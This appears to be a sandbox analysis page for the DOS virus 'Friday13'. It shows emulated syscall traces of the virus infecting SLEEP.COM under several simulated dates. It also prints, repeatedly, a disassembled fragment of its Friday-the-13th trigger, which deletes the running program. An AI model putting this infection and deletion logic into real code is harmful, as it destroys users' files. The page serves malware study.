Sample viewer

vx.netlux.org/Virus.DOS.Friday13.x

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:40:35.719277872Z	26	PC: 12acd \| Set disk transfer address
2018-12-17T22:40:35.721365481Z	78	PC: 12ad6 \| Find first file
2018-12-17T22:40:35.727496748Z	61	PC: 12b0e \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:40:35.734280338Z	63	PC: 12b27 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:40:35.757252631Z	66	PC: 12b4a \| Move file pointer
2018-12-17T22:40:35.75952431Z	66	PC: 12b5f \| Move file pointer
2018-12-17T22:40:35.761511435Z	64	PC: 12b6b \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:40:35.764640047Z	66	PC: 12b78 \| Move file pointer
2018-12-17T22:40:35.766712986Z	64	PC: 12b84 \| Write file or device (Write 416 bytes on handle 5)
2018-12-17T22:40:35.779856109Z	62	PC: 12b94 \| Close file
2018-12-17T22:40:35.789456565Z	42	PC: 12b9b \| Get date 0x12b9b: cmp dl, 0xd 0x12b9e: jne 0x12bc2 0x12ba0: cmp al, 5 0x12ba2: jne 0x12bc2 0x12ba4: xor ax, ax 0x12ba6: mov cx, 0x7fff 0x12ba9: xor di, di 0x12bab: mov es, word ptr es:[0x2c] 0x12bb0: cld 0x12bb1: repne scasd eax, dword ptr es:[di] 0x12bb3: jne 0x12bc2 0x12bb5: add di, 2 0x12bb8: push ds 0x12bb9: push es 0x12bba: pop ds 0x12bbb: mov ah, 0x41 0x12bbd: mov dx, di 0x12bbf: int 0x21 0x12bc1: pop ds 0x12bc2: pop es
2018-12-17T22:40:35.793157976Z	26	PC: 12acd \| Set disk transfer address
2018-12-17T22:40:35.794491904Z	78	PC: 12ad6 \| Find first file
2018-12-17T22:40:35.801961054Z	61	PC: 12b0e \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:40:35.809635438Z	63	PC: 12b27 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:40:35.816156626Z	62	PC: 12b94 \| Close file
2018-12-17T22:40:35.81820035Z	42	PC: 12b9b \| Get date 0x12b9b: cmp dl, 0xd 0x12b9e: jne 0x12bc2 0x12ba0: cmp al, 5 0x12ba2: jne 0x12bc2 0x12ba4: xor ax, ax 0x12ba6: mov cx, 0x7fff 0x12ba9: xor di, di 0x12bab: mov es, word ptr es:[0x2c] 0x12bb0: cld 0x12bb1: repne scasd eax, dword ptr es:[di] 0x12bb3: jne 0x12bc2 0x12bb5: add di, 2 0x12bb8: push ds 0x12bb9: push es 0x12bba: pop ds 0x12bbb: mov ah, 0x41 0x12bbd: mov dx, di 0x12bbf: int 0x21 0x12bc1: pop ds 0x12bc2: pop es
2018-12-17T22:40:35.821382319Z	26	PC: 12acd \| Set disk transfer address
2018-12-17T22:40:35.82248677Z	78	PC: 12ad6 \| Find first file
2018-12-17T22:40:35.824132367Z	26	PC: 12aed \| Set disk transfer address
2018-12-17T22:40:35.826008329Z	61	PC: 12b0e \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:40:35.828075627Z	42	PC: 12b9b \| Get date 0x12b9b: cmp dl, 0xd 0x12b9e: jne 0x12bc2 0x12ba0: cmp al, 5 0x12ba2: jne 0x12bc2 0x12ba4: xor ax, ax 0x12ba6: mov cx, 0x7fff 0x12ba9: xor di, di 0x12bab: mov es, word ptr es:[0x2c] 0x12bb0: cld 0x12bb1: repne scasd eax, dword ptr es:[di] 0x12bb3: jne 0x12bc2 0x12bb5: add di, 2 0x12bb8: push ds 0x12bb9: push es 0x12bba: pop ds 0x12bbb: mov ah, 0x41 0x12bbd: mov dx, di 0x12bbf: int 0x21 0x12bc1: pop ds 0x12bc2: pop es

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7030,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:49.344604602Z	26	PC: 12acd \| Set disk transfer address
2018-12-25T12:00:49.346057236Z	78	PC: 12ad6 \| Find first file
2018-12-25T12:00:49.352735486Z	61	PC: 12b0e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:49.359920408Z	63	PC: 12b27 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:00:49.372108989Z	66	PC: 12b4a \| Move file pointer
2018-12-25T12:00:49.373639352Z	66	PC: 12b5f \| Move file pointer
2018-12-25T12:00:49.37507711Z	64	PC: 12b6b \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:00:49.377932972Z	66	PC: 12b78 \| Move file pointer
2018-12-25T12:00:49.379747465Z	64	PC: 12b84 \| Write file or device (Write 416 bytes on handle 5)
2018-12-25T12:00:49.395748827Z	62	PC: 12b94 \| Close file
2018-12-25T12:00:49.404523428Z	42	PC: 12b9b \| Get date 0x12b9b: cmp dl, 0xd 0x12b9e: jne 0x12bc2 0x12ba0: cmp al, 5 0x12ba2: jne 0x12bc2 0x12ba4: xor ax, ax 0x12ba6: mov cx, 0x7fff 0x12ba9: xor di, di 0x12bab: mov es, word ptr es:[0x2c] 0x12bb0: cld 0x12bb1: repne scasd eax, dword ptr es:[di] 0x12bb3: jne 0x12bc2 0x12bb5: add di, 2 0x12bb8: push ds 0x12bb9: push es 0x12bba: pop ds 0x12bbb: mov ah, 0x41 0x12bbd: mov dx, di 0x12bbf: int 0x21 0x12bc1: pop ds 0x12bc2: pop es
2018-12-25T12:00:49.408057527Z	26	PC: 12acd \| Set disk transfer address (See above)
2018-12-25T12:00:49.409168731Z	78	PC: 12ad6 \| Find first file (See above)
2018-12-25T12:00:49.415753167Z	61	PC: 12b0e \| Open file (See above)
2018-12-25T12:00:49.424773689Z	63	PC: 12b27 \| Read file or device (See above)
2018-12-25T12:00:49.429407711Z	62	PC: 12b94 \| Close file (See above)
2018-12-25T12:00:49.43066706Z	42	PC: 12b9b \| Get date (See above)
2018-12-25T12:00:49.43356585Z	26	PC: 12acd \| Set disk transfer address (See above)
2018-12-25T12:00:49.434512067Z	78	PC: 12ad6 \| Find first file (See above)
2018-12-25T12:00:49.435830859Z	26	PC: 12aed \| Set disk transfer address
2018-12-25T12:00:49.437392114Z	61	PC: 12b0e \| Open file (See above)
2018-12-25T12:00:49.439071052Z	42	PC: 12b9b \| Get date (See above)

{"DateBased":true,"Day":13,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7030,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:49.461153425Z	26	PC: 12acd \| Set disk transfer address
2018-12-25T12:00:49.4624973Z	78	PC: 12ad6 \| Find first file
2018-12-25T12:00:49.470566301Z	61	PC: 12b0e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:49.477527489Z	63	PC: 12b27 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:00:49.484583338Z	66	PC: 12b4a \| Move file pointer
2018-12-25T12:00:49.486181086Z	66	PC: 12b5f \| Move file pointer
2018-12-25T12:00:49.487556704Z	64	PC: 12b6b \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:00:49.490354688Z	66	PC: 12b78 \| Move file pointer
2018-12-25T12:00:49.491834018Z	64	PC: 12b84 \| Write file or device (Write 416 bytes on handle 5)
2018-12-25T12:00:49.507009743Z	62	PC: 12b94 \| Close file
2018-12-25T12:00:49.519710558Z	42	PC: 12b9b \| Get date 0x12b9b: cmp dl, 0xd 0x12b9e: jne 0x12bc2 0x12ba0: cmp al, 5 0x12ba2: jne 0x12bc2 0x12ba4: xor ax, ax 0x12ba6: mov cx, 0x7fff 0x12ba9: xor di, di 0x12bab: mov es, word ptr es:[0x2c] 0x12bb0: cld 0x12bb1: repne scasd eax, dword ptr es:[di] 0x12bb3: jne 0x12bc2 0x12bb5: add di, 2 0x12bb8: push ds 0x12bb9: push es 0x12bba: pop ds 0x12bbb: mov ah, 0x41 0x12bbd: mov dx, di 0x12bbf: int 0x21 0x12bc1: pop ds 0x12bc2: pop es
2018-12-25T12:00:49.523645326Z	65	PC: 12bc1 \| Delete file (Filename = 'A:\TEST.COM')
2018-12-25T12:00:49.536592665Z	26	PC: 12acd \| Set disk transfer address (See above)
2018-12-25T12:00:49.537745327Z	78	PC: 12ad6 \| Find first file (See above)
2018-12-25T12:00:49.545077483Z	61	PC: 12b0e \| Open file (See above)
2018-12-25T12:00:49.549691739Z	63	PC: 12b27 \| Read file or device (See above)
2018-12-25T12:00:49.554291948Z	62	PC: 12b94 \| Close file (See above)
2018-12-25T12:00:49.558732257Z	42	PC: 12b9b \| Get date (See above)
2018-12-25T12:00:49.560641837Z	65	PC: 12bc1 \| Delete file (See above)
2018-12-25T12:00:49.565596607Z	26	PC: 12acd \| Set disk transfer address (See above)
2018-12-25T12:00:49.566958299Z	78	PC: 12ad6 \| Find first file (See above)
2018-12-25T12:00:49.569546785Z	26	PC: 12aed \| Set disk transfer address
2018-12-25T12:00:49.57086427Z	61	PC: 12b0e \| Open file (See above)
2018-12-25T12:00:49.579030036Z	42	PC: 12b9b \| Get date (See above)
2018-12-25T12:00:49.584301148Z	65	PC: 12bc1 \| Delete file (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7030,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:49.564203335Z	26	PC: 12acd \| Set disk transfer address
2018-12-25T12:00:49.565972723Z	78	PC: 12ad6 \| Find first file
2018-12-25T12:00:49.572577712Z	61	PC: 12b0e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:49.579551629Z	63	PC: 12b27 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:00:49.586569642Z	66	PC: 12b4a \| Move file pointer
2018-12-25T12:00:49.589274797Z	66	PC: 12b5f \| Move file pointer
2018-12-25T12:00:49.591275202Z	64	PC: 12b6b \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:00:49.594700453Z	66	PC: 12b78 \| Move file pointer
2018-12-25T12:00:49.59712009Z	64	PC: 12b84 \| Write file or device (Write 416 bytes on handle 5)
2018-12-25T12:00:49.612118132Z	62	PC: 12b94 \| Close file
2018-12-25T12:00:49.622167281Z	42	PC: 12b9b \| Get date 0x12b9b: cmp dl, 0xd 0x12b9e: jne 0x12bc2 0x12ba0: cmp al, 5 0x12ba2: jne 0x12bc2 0x12ba4: xor ax, ax 0x12ba6: mov cx, 0x7fff 0x12ba9: xor di, di 0x12bab: mov es, word ptr es:[0x2c] 0x12bb0: cld 0x12bb1: repne scasd eax, dword ptr es:[di] 0x12bb3: jne 0x12bc2 0x12bb5: add di, 2 0x12bb8: push ds 0x12bb9: push es 0x12bba: pop ds 0x12bbb: mov ah, 0x41 0x12bbd: mov dx, di 0x12bbf: int 0x21 0x12bc1: pop ds 0x12bc2: pop es
2018-12-25T12:00:49.628614793Z	26	PC: 12acd \| Set disk transfer address (See above)
2018-12-25T12:00:49.629958494Z	78	PC: 12ad6 \| Find first file (See above)
2018-12-25T12:00:49.636997018Z	61	PC: 12b0e \| Open file (See above)
2018-12-25T12:00:49.645390666Z	63	PC: 12b27 \| Read file or device (See above)
2018-12-25T12:00:49.652699537Z	62	PC: 12b94 \| Close file (See above)
2018-12-25T12:00:49.654538904Z	42	PC: 12b9b \| Get date (See above)
2018-12-25T12:00:49.658116479Z	26	PC: 12acd \| Set disk transfer address (See above)
2018-12-25T12:00:49.659240669Z	78	PC: 12ad6 \| Find first file (See above)
2018-12-25T12:00:49.661202228Z	26	PC: 12aed \| Set disk transfer address
2018-12-25T12:00:49.663339219Z	61	PC: 12b0e \| Open file (See above)
2018-12-25T12:00:49.665737575Z	42	PC: 12b9b \| Get date (See above)